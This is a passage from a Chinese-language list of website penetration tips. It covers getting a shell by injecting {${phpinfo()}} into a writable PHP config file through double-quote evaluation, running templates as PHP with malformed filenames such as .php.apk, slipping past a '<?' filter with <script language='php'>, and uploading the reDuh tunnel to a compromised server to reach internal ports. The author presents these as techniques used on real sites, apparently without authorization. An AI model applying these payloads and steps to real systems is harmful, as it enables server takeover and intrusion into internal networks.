linux Shell expr可以参考
14. 渗透某站过程中,进了后台拿不到shell,后台配置文件可写,便下了源码研究。
具体代码:
$config["db"]["pass"] = "";
$config["db"]["data"] = "phpok";
$config["db"]["prefix"] = "可写入的数据";
$config["db"]["debug"] = false;
大胆地提交{${phpinfo()}}
访问配置文件,php代码被解析执行了。
原理是php双引号的解析执行,很多开源程序后台都可用这个拿shell喔。
Php双引号解析执行详见:
/Article/html/3/68/2013/36620.htm
15. 遇到可修改模板的地方,看能否修改模板为php后缀,若不行,考虑畸形文件名?
如.php.apk。apache是依旧当做PHP执行的。
服务器解析漏洞详见 /papers/539
16. 曾经搞一个站的后台,成功修改模板为.php后缀,但内容过滤了PHP标签<?
没办法了?
No! 写入:
<script language="php">phpinfo() ;</script>
成功写入并解析,done.
17. reDuh,一个不错的工具,可以映射内网端口到http或https端口的http服务上:
服务端有aps、jsp、php版,具体下载:/research/reDuh。下面简单说下这个工具
先在服务器上传服务端:访问/shell/reduh.jsp如下:
[reDuhError]Undefined Request
说明工作正常。在本地:
D:\Tools\reDuh\0.2\reDuhClient>java reDuhClient 80
/shell/reduh.jsp
[Info]Querying remote JSP for usable remote RPC port
[Info]Remote RPC port chosen as 42001
[Info]Attempting to start reDuh.jsp from :80/shell/reduh.jsp and set